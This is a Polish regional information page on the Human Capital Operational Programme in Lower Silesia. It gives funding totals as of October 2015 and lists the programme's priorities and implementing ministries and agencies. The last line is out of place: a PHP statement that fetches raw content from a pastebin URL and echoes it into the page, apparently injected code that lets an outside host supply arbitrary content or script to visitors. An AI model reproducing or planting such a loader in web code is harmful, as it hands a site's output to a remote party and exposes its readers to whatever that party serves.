Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Priorytety

Priorytety Programu Operacyjnego Kapitał Ludzki:

Centralne:

I. Zatrudnienie i integracja społeczna
Ministerstwo Pracy i Polityki Społecznej www.kapitalludzki.gov.pl 
Władza Wdrażająca Programy Europejskie, Ministerstwo Spraw Wewnętrznych i Administracji www.wwpe.gov.pl
Centrum Rozwoju Zasobów Ludzkich www.crzl.gov.pl

II. Rozwój zasobów ludzkich i potencjału adaptacyjnego przedsiębiorstw oraz poprawa stanu zdrowia osób pracujących
Ministerstwo Pracy i Polityki Społecznej www.kapitalludzki.gov.pl 
Polska Agencja Rozwoju Przedsiębiorczości www.parp.gov.pl
Ministerstwo Zdrowia www.zdrowie.gov.pl 

III. Wysoka jakość systemu oświaty
Ministerstwo Edukacji Narodowej www.men.gov.pl 
Ośrodek Rozwoju Edukacji www.ore.edu.pl   

IV. Szkolnictwo wyższe i nauka
Narodowe Centrum Badań i Rozwoju www.ncbir.pl - aktualnie
(Ministerstwo Nauki i Szkolnictwa Wyższego www.nauka.gov.pl - poprzednio)

V. Dobre rządzenie
Ministerstwo Spraw Wewnętrznych i Administracji www.mswia.gov.pl
Kancelaria Prezesa Rady Ministrów www.kprm.gov.pl
Ministerstwo Pracy i Polityki Społecznej www.kapitalludzki.gov.pl  

Regionalne (www.efs.dolnyslask.pl; www.pokl.dwup.pl):

VI. Rynek pracy otwarty dla wszystkich

VII. Promocja integracji społecznej

VIII. Regionalne kadry gospodarki

IX. Rozwój wykształcenia i kompetencji w regionach

X. Pomoc techniczna

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");